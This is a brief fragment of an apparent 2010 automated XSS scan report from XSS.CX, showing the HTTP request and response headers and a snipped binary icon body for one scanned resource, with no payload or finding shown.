User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:11:07 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 16:40:44 GMT
ETag: "11730d-57e-488c3ccdedb00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Content-Length: 1406

..............h.......(....... .......................................PPP.ddd.........ppp.NNN.........ooo.@@@.........................000...............................................................
...[SNIP]...

Report generated by XSS.CX at Tue Dec 28 20:34:05 CST 2010.